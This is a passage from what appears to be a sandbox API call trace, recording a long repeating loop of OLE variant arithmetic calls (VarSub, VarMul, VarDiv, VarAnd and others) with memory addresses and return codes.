pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.427] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.427] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.427] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.427] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.427] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.427] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.427] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.427] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.427] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.427] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.427] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.427] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.427] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.427] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.427] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.427] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.427] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.427] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.427] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.428] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.428] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.428] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.428] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.428] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.428] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.428] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.428] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.428] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.428] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.428] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.428] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.428] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.428] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.428] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.428] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.428] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.428] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.428] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.428] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.428] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.428] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.428] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.428] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.428] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.428] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.428] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.428] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.428] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.428] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.428] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.429] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.429] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.429] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.429] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.429] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.429] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.429] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.429] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.429] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.429] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.429] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.429] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.429] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.429] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.429] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.429] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.429] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.429] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.429] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.430] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.430] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.430] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.430] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.430] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.430] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.430] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.430] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.430] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.430] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.430] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.430] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.430] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.430] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.430] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.430] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.430] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.430] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.430] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.430] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.430] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.430] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.430] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.430] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.430] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.430] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.431] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.431] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.431] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.431] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.431] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.431] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.431] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.431] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.431] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.431] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.431] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.431] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.431] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.431] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.431] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.431] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.431] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.431] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.432] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.432] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.432] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.432] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.432] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.432] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.432] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.432] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.432] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.432] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.432] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.432] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.432] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.432] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.432] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.432] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.432] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.432] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.432] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.432] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.432] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.433] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.433] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.433] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.433] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.433] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.433] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.433] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.433] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.433] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.433] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.433] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.433] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.433] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.433] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.433] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.433] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.433] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.433] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.433] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.433] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.433] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.433] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.433] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.433] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.433] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.433] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.433] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.433] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.433] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.433] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.433] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.433] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.434] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.434] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.434] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.434] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.434] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.434] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.434] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.434] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.434] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.434] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.434] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.434] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.434] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.434] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.434] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.434] VarDiv (in: pvarLeft=0x18fb88, 